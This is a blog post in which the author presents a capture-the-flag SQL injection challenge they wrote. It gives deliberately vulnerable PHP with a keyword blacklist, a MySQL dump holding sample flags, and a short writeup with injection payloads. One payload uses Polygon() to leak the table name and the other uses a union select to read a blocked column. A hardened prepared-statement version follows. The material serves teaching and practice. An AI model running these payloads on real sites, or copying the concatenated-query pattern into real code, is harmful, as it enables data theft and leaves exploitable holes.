NEKO

Challenges I wrote myself ORZ

2018/06/20

SQL Injection

sqli1

Source code:

<?php
error_reporting(0);
// Legacy mysql_* API (removed in PHP 7), kept as in the original challenge.
$conn = mysql_connect('127.0.0.1', 'root', 'root') or die("could not connect:" . mysql_error());
mysql_select_db('neko_web1', $conn) or die('can not use:' . mysql_error());
if (isset($_GET['id'])) {
    $id = $_GET['id'];
    // Keyword blacklist (case-insensitive): flag, /, %, or, and, group, where.
    if (preg_match('/(flag|\/|\%|or|and|group|where)/i', $id)) {
        die('(;´д`)ゞ');
    }
    // Intentionally vulnerable: $id is concatenated straight into the query.
    $sql = "select username,phone from info where id='" . $id . "'";
    // Database error messages are echoed back to the client.
    $result = mysql_query($sql) or die(mysql_error());
    $row = mysql_fetch_array($result);
    if ($row) {
        echo "<hr>";
        echo "user:" . $row['username'] . "<br>";
        echo "phone:" . $row['phone'] . "<br>";
        echo "<hr>";
    } else {
        echo "user not exist";
    }

}

Database:

# Host: localhost  (Version: 5.5.53)
# Date: 2018-06-20 14:32:31
# Generator: MySQL-Front 5.3 (Build 4.234)

/*!40101 SET NAMES utf8 */;

#
# Structure for table "info"
#

DROP TABLE IF EXISTS `info`;
CREATE TABLE `info` (
  `id` int(4) NOT NULL AUTO_INCREMENT,
  `username` varchar(20) NOT NULL,
  `email` varchar(20) NOT NULL,
  `phone` int(20) NOT NULL,
  `flag` varchar(30) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8;

#
# Data for table "info"
#

/*!40000 ALTER TABLE `info` DISABLE KEYS */;
INSERT INTO `info` VALUES (1,'neko','neko@qq.com',123456,'flag{not_true_flag}'),(2,'syabe','syabe@qq.com',75391,'flag{n3k0_kn}');
/*!40000 ALTER TABLE `info` ENABLE KEYS */;

Key points:

Column names are blocked by the filter
Use the Polygon() function to obtain the table name

Writeup:

id=1' %26%26 Polygon(id)-- - =>info
id=-1' union select `1`,`5` from (select 1,2,3,4,5 union select * from info)as neko limit 2,1-- -
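
A hardened version of the sqli1 lookup, added here as an example and not part of the original challenge code: it replaces the keyword blacklist with strict integer validation plus a bound parameter, and keeps driver errors out of the response. The function names `blacklistAllows` and `lookupUser` and the in-memory SQLite stand-in (requires pdo_sqlite) are assumptions made so the script runs offline; the three inputs are the URL-decoded `id` values, one legitimate and the two from the writeup above.

```php
<?php
declare(strict_types=1);

// The challenge's blacklist, copied from the page, kept only for comparison.
function blacklistAllows(string $id): bool
{
    return preg_match('/(flag|\/|\%|or|and|group|where)/i', $id) !== 1;
}

// Hardened lookup: allow-list the id as 1-9 decimal digits (always fits a
// signed 32-bit INT column), then pass it as a bound integer parameter.
function lookupUser(PDO $pdo, string $rawId): ?array
{
    if (preg_match('/\A[1-9][0-9]{0,8}\z/', $rawId) !== 1) {
        return null;
    }
    try {
        $stmt = $pdo->prepare('SELECT username, phone FROM info WHERE id = :id');
        $stmt->bindValue(':id', (int) $rawId, PDO::PARAM_INT);
        $stmt->execute();
        $row = $stmt->fetch(PDO::FETCH_ASSOC);
    } catch (PDOException $e) {
        // Log server-side; never echo driver errors (they leaked the table name).
        error_log($e->getMessage());
        return null;
    }
    return $row === false ? null : $row;
}

// Constructed stand-in for the MySQL table (assumption: pdo_sqlite is loaded).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE info (id INTEGER PRIMARY KEY, username TEXT, email TEXT, phone INTEGER, flag TEXT)');
$pdo->exec("INSERT INTO info VALUES
            (1,'neko','neko@qq.com',123456,'flag{not_true_flag}'),
            (2,'syabe','syabe@qq.com',75391,'flag{n3k0_kn}')");

// $_GET['id'] values: one legitimate id and the two writeup inputs, URL-decoded.
$inputs = [
    '2',
    "1' && Polygon(id)-- -",
    "-1' union select `1`,`5` from (select 1,2,3,4,5 union select * from info)as neko limit 2,1-- -",
];
foreach ($inputs as $in) {
    $row = lookupUser($pdo, $in);
    printf("blacklist=%s hardened=%s input=%s\n",
        blacklistAllows($in) ? 'pass' : 'block',
        $row === null ? 'no row' : $row['username'], $in);
}
```

Against the real MySQL database, pass `lookupUser` a pdo_mysql handle opened with a dedicated low-privilege account instead of `root`.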

Original author: n3k0

Published: June 20th 2018, 2:52:44

Screaming: I'm going to die without 魔夜2 to play
